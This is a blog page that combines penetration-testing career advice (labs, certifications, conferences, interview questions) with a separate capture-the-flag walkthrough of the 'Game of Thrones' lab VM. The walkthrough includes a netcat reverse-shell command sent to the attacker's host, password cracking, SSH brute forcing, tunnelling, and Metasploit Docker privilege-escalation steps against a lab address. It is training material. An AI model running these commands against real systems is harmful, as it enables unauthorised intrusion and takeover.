Pentester Tales: 2018

There are many people with different backgrounds approaching the world of Information Security and trying to land a job in this field: software developers, sysadmins, network engineers, IT technicians, even people whose formal education and previous job don’t have anything to do with Infosec. Nowadays there aren’t strict requirements in terms of education for being an Information Security Professional, everyone who puts a lot of efforts in it can succeed, anyway obviously having a degree in computer science and a master degree in cyber security would certainly help. If you don’t have a degree under your belt, but you have some relevant certifications or you simply think you are good and can demonstrate your skills for doing this job, then you are welcome.

GET-HIRED-INFOGRAPHIC

HAVE A SOLID TECHNICAL BACKGROUND

ACADEMIA

If you have time and money getting a bachelor degree in Computer Science and a Master’s degree or Phd in Computer Security is certainly worth it and it will stand out in your resume.

SELF STUDY

Even if you couldn’t study computer science and security at university don’t worry because you aren’t certainly alone. I recommend you to read an article I wrote about the prerequisites for learning penetration testing. There are many valuable resources available online for free, so you have no excuses for stopping what you are doing and start learning. Checkout the Open Source Society University curriculum in Computer Science that you can find on github which lists MOOC courses developed by some of the most prestigious universities. Also have a look at the awesome-pentest list, still on github.

GAIN PRACTICAL SKILLS

Being able to understand and discuss with other security professionals about security threats, testing methodologies, tools, remediations and so on is important but you don’t just need to read, write and speak, you need to actually be able to perform a penetration test. You need to hack like hackers do, although in a systematic and organized way. Hacking devices and networks that don’t belong to you without a formal consent is illegal, that’s why you’ll need to setup your own testing lab.

You will need one or more computers, a virtualization software like VMWare or VirtualBox, images of different operating systems that you would like to test, including vulnerable by design operating systems like metasploitable, metasploitable 2 or many others that you can find on vulnhub.com . You’ll also need a pentest environment, it can be your own customized distro or popular distros like Kali Linux, Backbox Linux, BlackArch and so on. You may want to test also multiple network configurations, firewalls, intrusion detection systems, although this is optional, but it will make things more realistic when attacking highly secure environments. Here you can find a simple and clear guide by Offensive Security on how to setup a penetration testing lab.

If you want to sharpen your skills about web app penetration testing I recommend you to try DVWA, WebGoat or others. You can find a long list here: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=Main . There are online apps, offline apps, virtual machines or ISOs. You’ll usually need a LAMP or LEMP stack in order to run the apps. If you don’t want to waste your time and hack immediately, then I recommend you to try the Hack.me project by eLearnSecurity where you can find find many vulnerable apps or upload yours and test them in a sandboxed environment.

Another awesome way to sharpen your skills is participating to CTFs. You can find an extensive list of upcoming and past CTFs on CTFtime.org . If you are interested in write ups you can find them on https://ctftime.org/writeups, https://github.com/ctfs or https://ctf-team.vulnhub.com.

SHOW YOUR PASSION

If you are like me and you spend at least 6 hours a day hacking around or you employ all your limited free time for this when you get home after your part time/full time job then you are really interested in infosec and you are on the right track. It is known that hackers hack at night, anyway especially if you have got a job, consider getting enough sleep and get some fresh air at least 1-2 days a week

Hang out with friends, have fun, relax and free your mind, you’ll study better. Coffee helps as well. Please do yourself a favor and don’t drink instant coffee but a beloved espresso. Yes I’m a proud Italian in case you didn’t know it. Hacking can be challenging, stressing, painful, time and energy consuming, but make sure to have a smile on your face when talking about infosec with your friends or potential employers. It can be a tough job but you need to be happy after all, otherwise maybe it’s not the job for you or your work environment isn’t that great. Nobody forbids you to change and take a break, but if you were born as a hacker you’ll die as a hacker.

COLLABORATE TO OPEN SOURCE PROJECTS

Collaborating to open source projects is very useful for multiple reasons:

being part of the open source community
actually help the author of a tool to further develop it
being able to read the code and learn by example
being able to fork a project and edit it or implement it in your own tool
learn how git or other versioning tools work
learn how to write an effective documentation
showcase your open source tools or commits to existing projects

For a list of projects you can contribute to you can have a look directly at https://github.com, http://sectools.org , http://www.toolswatch.org or http://www.kitploit.com for example.

EARN HANDS ON INFOSEC CERTIFICATIONS

Now this is a controversial topic. Someone will tell you that certifications are completely useless, someone will tell you they are a must have, I believe the truth lies somewhere in the middle.

Certifications hardly guarantee expertise even because in order to be competent in something you’ll need both theoretical and practical skills + preferably a number of years of work experience. Anyway certifications can be good for testing your skills especially if you self study and if you don’t have a degree and relevant work experience, they may still allow you to be considered for a job interview. As I said before, having a certification doesn’t guarantee expertise, someone who isn’t certified could be still better than someone who isn’t, anyway getting certified doesn’t hurt (unless you consider your pocket maybe), does it?

What kind of certifications should I have?

My answer is it is better to have a few highly recognized certifications focused on security rather than a lot of certifications that are more generic. You don’t want to be an IT technician, a sysadmin, a network engineer, a software developer, hey you want to be a penetration tester, so the certifications you hold should be focused on demonstrating your skills at vulnerability assessment, exploitation and post exploitation, evaluation of risks and reporting. It’s easier said than done. I would suggest you to skip certifications whose exams are based on multiple choice questions: you may as well memorize all the answers or anyway they test your knowledge but not your practical skills that are equally if not more important. I don’t recommend getting entry level certifications like Comptia Security+ or CEH, well better than nothing, but don’t expect them to be taken in high consideration (although oddly enough they are recognized for some government/DoD jobs). If you want to get a certification I recommend OSCP and OSCE by Offensive Security or eCPPT Gold by eLearnSecurity. The exams required in order to get these certifications are hands on, therefore you need to apply in practice what you learnt in theory and practiced in the labs. Offensive Security also offer OSWP for wireless penetration testing, OSEE for Windows exploitation and OSWE for web app pentesting. eLearnSecurity on the other hand also offers eCRE for reverse engineering, eMAPT for mobile application penetration testing, eNDP for network defense, eWDP for web defense, eWPT and eWPTX for web app pentesting. If you feel that eCPPT is too hard for you, you can also consider going for eJPT first in order to lay the necessary foundations about computer security.

If you are in the UK it is also recommended to get CREST certified by taking an hands on exam at an approved testing center. Remember to bring your own computer and you’ll be asked to leave your hard disk there in order to be erased after the exam session. There isn’t an official course for preparing to take the CREST exam but there is a syllabus and some suggested books and approved third party courses. Recently who holds OSCP is able to get CREST certified by paying a fee and doing a smaller test.

GIAC certifications are also highly regarded although there is an open book exam and multiple choice questions, not really as hands on as the aforementioned certifications. SANS Institute is the GIAC’s preferred partner for exam preparation, live, self study, online and on-demand courses are available. They are generally expensive so not every individual is willing to take them and pay the fee out of his pocket but infosec companies often provide a sponsorship for those who want to get certified. There are many GIAC certifications, for a full list I advise you to check the official website, I’ll just mention the 3 most common ones that are GSEC (security essentials – entry level), GPEN (penetration testing) and GWAPT (web app penetration testing).

CISSP by ISC2 is also worth getting, anyway it is more aimed at forging infosec managers than penetration testers. If you take a look at the syllabus you’ll notice that there is a wide list of topics that you need to know but not so in depth. The CISSP exam tests one’s competence in the 8 domains of the CISSP CBK, which cover: Security and Risk Management; Asset Security; Security Engineering; Communications and Network Security; Identity and Access Management; Security Assessment and Testing; Security Operations; Software Development Security. Candidates must have a minimum of 5 years cumulative paid full-time work experience in two or more of the 8 domains of the (ISC)² CISSP CBK®. Candidates may receive a one year experience waiver with a 4-year college degree, or regional equivalent or additional credential from the (ISC)² approved list, thus requiring four years of direct full-time professional security work experience in 2 or more of the 8 domains of the CISSP CBK. Don’t have the experience? Become an Associate of (ISC)² by successfully passing the CISSP exam. You’ll have 6 years to earn your experience to become a CISSP.

CREATE YOUR OWN PROJECTS, METHODOLOGIES AND TOOLS

You can take inspiration by existing projects, methodologies and tools to create your own!

You can create a local group of people interested in infosec and have regular meetups, you can create a local chapter of a well established not for profit computer security association, you can gather people and create your own security conference! Dream big and keep moving! Some of these things require time, experience and a lot of efforts, anyway do as much as you can to contribute to the infosec community.

Do you think there are new security threats and attack vectors and they isn’t a standardized testing methodology yet? You can contribute to big projects like OSSTMM and OWASP or create your own!

Do you have an amazing idea for a tool and unfortunately it isn’t available anywhere because nobody developed it? Why don’t you do it?! It’s an incredible occasion to sharpen your coding skills, meet new friends (contributors), give back to the infosec community and get noted by potential employers.

START YOUR OWN SECURITY BLOG

You read a lot, don’t you? Keeping up to date with the new infosec trends and discoveries should be your daily task. There are specialized websites, companies’ blogs and also valuable personal blogs that can enrich your knowledge. If you discover something new or you are particularly gifted at explaining things, why don’t you start your security blog? Other people can learn from you and by teaching you can reinforce your own knowledge. Did you do a particular research recently? Did you develop a new tool? Nobody will know about it if you keep it secret. Create a security blog and share it with the world! You never know, you could get the attention of potential employers as well. It’s both a personal passion and an investment.

NETWORK WITH THE PROS

Ok you are great, nobody doubts that, but getting to know other people working in the same field can be very useful and beneficial. There are several ways to meet other people. Maybe you can meet someone who is collaborating to the same project or open source tool. Another possibility is that one of participating to conferences, expos, meetings, hackathons and CTFs. Besides don’t neglect social networks. Many people use Facebook but mostly for personal use (anyway if you use it you can like my page https://www.facebook.com/thepentestguru/), instead there are a lot of infosec people who use Twitter for sharing actual infosec stuff so make sure to use it. You can follow my personal feed @Fabiothebest89 and pentest guru’s feed @pentestguru. Besides there is a new social network created right for connecting infosec professionals, check it out in case you don’t know it yet: https://www.peerlyst.com. This is my profile: https://www.peerlyst.com/users/fabio-baroni.

Now I will list a series of security conferences that I recommend you to attend if you can:

DEF CON – An annual hacker convention in Las Vegas
Black Hat – An annual security conference in Las Vegas
BSides – A framework for organising and holding security conferences
CCC – An annual meeting of the international hacker scene in Germany
DerbyCon – An annual hacker conference based in Louisville
PhreakNIC – A technology conference held annually in middle Tennessee
ShmooCon – An annual US east coast hacker convention
CarolinaCon – An infosec conference, held annually in North Carolina
HOPE – A conference series sponsored by the hacker magazine 2600
SummerCon – One of the oldest hacker conventions, held during Summer
Hack.lu – An annual conference held in Luxembourg
HITB – Deep-knowledge security conference held in Malaysia and The Netherlands
Troopers – Annual international IT Security event with workshops held in Heidelberg, Germany
Hack3rCon – An annual US hacker conference
ThotCon – An annual US hacker conference held in Chicago
LayerOne – An annual US security conference held every spring in Los Angeles
DeepSec – Security Conference in Vienna, Austria
SkyDogCon – A technology conference in Nashville
SECUINSIDE – Security Conference in Seoul
DefCamp – Largest Security Conference in Eastern Europe, held anually in Bucharest, Romania
AppSecUSA – An annual conference organised by OWASP
BruCON – An annual security conference in Belgium
Infosecurity Europe – Europe’s number one information security event, held in London, UK
Nullcon – An annual conference in Delhi and Goa, India
RSA Conference USA – An annual security conference in San Francisco, California, USA
Swiss Cyber Storm – An annual security conference in Lucerne, Switzerland
Virus Bulletin Conference – An annual conference going to be held in Denver, USA for 2016
Ekoparty – Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina
44Con – Annual Security Conference held in London

PREPARE FOR THE INTERVIEW

When preparing for an interview you should review the penetration testing methodologies, practice in your pentesting lab and think about the questions the interviewer may ask you. This depends on a number of factors. Make sure to read carefully the job description. Try to get in touch with the recruiter/interviewer prior to the interview and ask info if necessary. Is it a junior or senior pentesting role? Will you be a trainee or will you have to manage other people? Will it be office or home based? Will you be part of a red team or blue team of the hiring company or will it be a consultancy job that requires you to travel to multiple companies? You should reflect on all these things. If you are a senior information security professional I’m sure you’ll have done at least some interview and you’ll be familiar about what the interviewer normally asks or you may have been an interviewer yourself for a junior role, but if you are just starting I’m sure you’ll appreciate some guidance. I’ll write here some questions that you may hear so that you can prepare yourself prior to the interview, avoid to fall into some traps and succeed.

NETWORK SECURITY

Are open-source projects more or less secure than proprietary ones?
How do you change your DNS settings in Linux/Windows?
What’s the difference between encoding, encryption, and hashing?
What’s more secure, SSL or HTTPS?
Can you describe rainbow tables?
What is salting, and why is it used?
Who do you look up to within the field of Information Security? Why?
Where do you get your security news from?
If you had to both encrypt and compress data during transmission, which would you do first, and why?
What’s the difference between symmetric and public-key cryptography?
In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which function?
What kind of network do you have at home?
What are the advantages offered by bug bounty programs over normal testing practices?
What are your first three steps when securing a Linux server?
What are your first three steps when securing a Windows server?
Who’s more dangerous to an organization, insiders or outsiders?
Why is DNS monitoring important?
What port does ping work over?
Do you prefer filtered ports or closed ports on your firewall?
How exactly does traceroute/tracert work at the protocol level?
What are Linux’s strengths and weaknesses vs. Windows?
Cryptographically speaking, what is the main method of building a shared secret over a public medium?
What’s the difference between Diffie-Hellman and RSA?
What kind of attack is a standard Diffie-Hellman exchange vulnerable to?

APPLICATION SECURITY

Describe the last program or script that you wrote. What problem did it solve?
How would you implement a secure login field on a high traffic website where performance is a consideration?
What are the various ways to handle account brute forcing?
What is Cross-Site Request Forgery?
How does one defend against CSRF?
If you were a site administrator looking for incoming CSRF attacks, what would you look for?
What’s the difference between HTTP and HTML?
How does HTTP handle state?
What exactly is Cross Site Scripting?
What’s the difference between stored and reflected XSS?
What are the common defenses against XSS?

CORPORATE/RISK

What is the primary reason most companies haven’t fixed their vulnerabilities?
What’s the goal of information security within an organization?
What’s the difference between a threat, vulnerability, and a risk?
If you were to start a job as head engineer or CSO at a Fortune 500 company due to the previous guy being fired for incompetence, what would your priorities be? [Imagine you start on day one with no knowledge of the environment]
As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities?

Are you tired yet? If yes, go catch some sleep, otherwise be prepared to read other questions. I don’t want you to come and tell me that you weren’t prepared for the interview

What is the biggest threat facing web applications in your experience?
What does RSA stand for?
What conferences do you routinely attend?
How do you create SSL certificate, generically speaking?
What is meterpreter?
With regard to forensics, what is physically different about how the platters are used in a 3.5″ and a 2.5″ HDD?
What’s the difference between a router, a bridge, a hub and a switch?
What’s port scanning and how does it work?
Can we perform VA remotely?
What experience do you have with Data Loss Prevention (DLP)?
Give me an example of when you thought outside of the box. How did it help your employer?
What is a spyware?
Is NT susceptible to flood attacks?
How does HTTP handle state?
What is DES?
What is DNS Hijacking?
What is LDAP?
What are DCO and HPA?
Are there limitations of Intrusion Detection Signatures?
Please explain how asymmetric encryption works
How do you determine when to update virus protection systems?
What is Stuxnet?
What is Wireshark?
What do you see as challenges to successfully deploying/monitoring web intrusion detection?
What ports must I enable to let NBT (NetBios over TCP/IP) through my firewall?
Are server-side includes insecure?
What’s the difference between a threat, a vulnerability and a risk?
What are IDA and/or Olly?
What is the difference between stored and reflected XSS?
What is NMAP?
What is NAT and how does it work?
What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
Have you hacked any system?
Your network as been infected by malware. Please walk me through the process of cleaning up the environment.
What is PCI compliance testing?
What is %3C in HTML encoding?

Now go out there and rock! Let me know how it goes

Source : Pentestguru

Hello friends! Today we are going to take another CTF challenge known as Game of Thrones. The credit for making this vm machine goes to “OscarAkaElvis” and it is another capture the flag challenge in which our goal is to get all the flags to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.133 but you will have to find your own)
netdiscover

Use nmap for port enumeration
nmap -p- -sV 192.168.1.133

We find that port 80 is running http, so we open the ip in our browser.

We take a look at the source code and find the flag syntax.

Use dirb to enumerate the ports.
dirb http://192.168.1.133

We find the robots.txt file, we open it and find few directories.

We open the directory /secret-island/ using user-agent Three-eyed-raven

We open it and find a link to a map.

When we open the map we find the location of all the flags.

We open the directory called /direct-access-to-kings-landing/ using user-agent Three-eyed-raven.

We open the directory and take a look at the source code and find what looks like port for port knocking and to user as oberynmartell.

We then find /h/i/d/d/e/n/ directory using dirb and we open it.

We take a look at the source code and find password for oberynmartell.

We use ftp to connect we use the username and password we previously found to login. We get the first flag as soon we login.

We find two files and download through ftp and find a file that gives us the type of hash it uses.
We save the hash in a file.

Now we use john the ripper to decrypt the file and find the password to be stark
John –format=dynamic_2008 hash.txt

Now we use mcrypt to decrypt the encrypted file we found in the ftp server.
mcrypt -d the_wall.txt.nc

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.

We login using the username and password to login, and find a page with two images.

We take a look at the source code, and we find the second flag.

Along with the second flag we also find a hint that it contains something, so we download the file and use strings to take a look inside the file and find a domain name.
strings stark_shield.jpg

It hints us that TXT record will contain something useful so we use nslookup to check the TXT records. We had to make some changes to the domain name to make it valid, and we find our 3^rd flag.
nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Now we add the new domain name to /etc/hosts and open the link found in TXT record above.

We use login the username and password we find in the TXT records.

We use the search provided by the site to check for vulnerabilities.

We use the file manager module and it opened a file manager that lets us access few files.

In /home/aryastark folder we find a file called flag.txt

We download the file and open it in our system and find our 4^th flag.

Now we got a hint to access a database now we know the server is running postgresql, we connect to it using the username password available in the file we find earlier.
psql –h 192.168.1.133 –u robinarryn –d mountainandthevale

We find a table called flag, we open it and find a base64 encoded string.

We decode the base64 encode string and find our 5^th flag.

Now we check the other tables to check if we miss anything. In one of the tables we find a few names
Select * from arya_kill_list
In arya_kill_list we find these names that seems useful.

Searching through the database we find a rot16 encoded string.

We now convert the rot16 encoded flag and find a name of database along with the password. It also gives us a hint to use the username we find in the table above.

After enumerating the username we find that TheRedWomanMelisandre is the username.

Now we check the the table and find a secret flag.

Now we know kingdom of reach is in imap as it was shown in the map, now we use the number we find earlier to port knock.
knock 192.168.1.133 3487 64535 12345

Now we do a nmap scan to check if any new port opened on the server, we find that port 143 that is running imap opened.
nmap -p- 192.168.1.133

We use netcat to connect to it, we use the username and password we find in the hint earlier.
nc 192.168.1.133 143

In the inbox we find our 6^th flag, we also get a hint to use port 1337 and a username and password is given to login.

We login into the site and find that it is git site.

After enumerating through the files we find that this site is vulnerable to command injection and a hint to use mysql.

We use netcat to get reverse shell on the site we use “”code to execute our code.
nc –e /bin/bash 192.168.1.116 1234

Now we setup our listener using netcat as soon as we execute our command we get a reverse shell.
nc -lvp 1234

On the webpage earlier we find hex encoded string when we decode it we get a location of a file:/home/tyrionlannister/checkpoint.txt, so we open it and find username, password and name of the database we need to look for.

Now we use the information above to find the tables available in the database.

We find the name of the table, it is called iron_throne, we take a look inside the table.

Now we find a morse code when we decode it we find it converts to /etc/mysql/flag, when we try to access it gives that file not found, earlier we find a hint that states we don’t have enough privileges so we try to take a look at our privileges.

We find that we can import files into the database. So first we create a table named Flag.

Now we import the file into our table.

Now when we access it we find our 7^th flag. We also get username and password for ssh login.

Now we use this to login through ssh.
ssh daenerystargaryen@192.168.1.133

Enumerating through the system we find two files called digger.txt and checkpoint.txt, checkpoint.txt contains a hint to login through ssh at ip 172.25.0.2 and use the file digger.txt to login through ssh.

We download digger.txt to our system through ssh.
scp digger.txt root@192.168.1.116:

We use local tunnelling to bind it to our port 2222.
ssh daenerystargaryen@192.168.1.133 –L 2222:172.25.0.2:22 –N

Now we use hydra to login through ssh to using username as root and use digger.txt file to brute force.
We find that for the username root we have password “Dr4g0nGl4ss!”

We use this to login through ssh, we use localhost to connect as we have done ssh local tunnel to connect to trough ssh.

Now we enumerating through the files we find our secret flag. We also get a username and password to login through ssh.

We use metasploit to connect through ssh using this username and password.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run

After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation in metasploit.
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) > run

Now we get our escalated session, we now check and find that we are root.

Now we enumerate through the files and find password protected zip file called final_battle and a file that tells us how to find the password. It contains a pseudo code that tells us how to create the password using secret flags we found.

Now we have obtained 2 secret flag, searching through the files we find that music file contain a secret flag. In the home page we find 2 music file we use exiftool and find that the mp3 file contains the secret flag.
exiftool game_of_thrones.mp3